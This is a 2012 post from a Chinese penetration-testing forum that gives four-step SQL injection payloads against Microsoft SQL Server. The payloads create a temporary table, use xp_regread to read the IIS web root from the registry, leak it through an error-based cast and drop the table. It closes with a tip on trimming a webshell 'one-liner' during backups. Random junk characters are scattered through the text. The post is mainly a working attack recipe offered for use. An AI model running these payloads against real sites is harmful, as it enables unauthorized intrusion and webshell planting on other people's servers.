找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 DB权限暴出网站物理路径代码
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1872|回复: 0
打印 上一主题 下一主题

DB权限暴出网站物理路径代码

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:23:52 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表8 a$ P# r0 }3 D; t7 |; b5 X) I6 g

8 q& }. b3 Z' s5 z- D* ]1 ]1 N4 E2 T2 i! V# x  q
  2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中+ _0 Z4 l/ ^2 V$ t( a
- `4 b2 Q5 ?& J- I8 b
3 n& W( }7 Z7 O% |9 q& P1 p
  3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段/ j1 W4 Q5 e& Y% c. L3 N) ^4 u
1 H& t7 h- R: e) r! }

9 |3 G1 Q# I5 [+ ]  x  4、drop table [jm_tmp]-- 删除此表。
; X' K: m( l& w- l
# Y7 f  l  s6 ]; y9 _8 C2 H' P+ D
另附上备分专用一句话
  X- n3 b/ X4 W) v" w  加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小./ n: X& I. g7 W& n) {
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表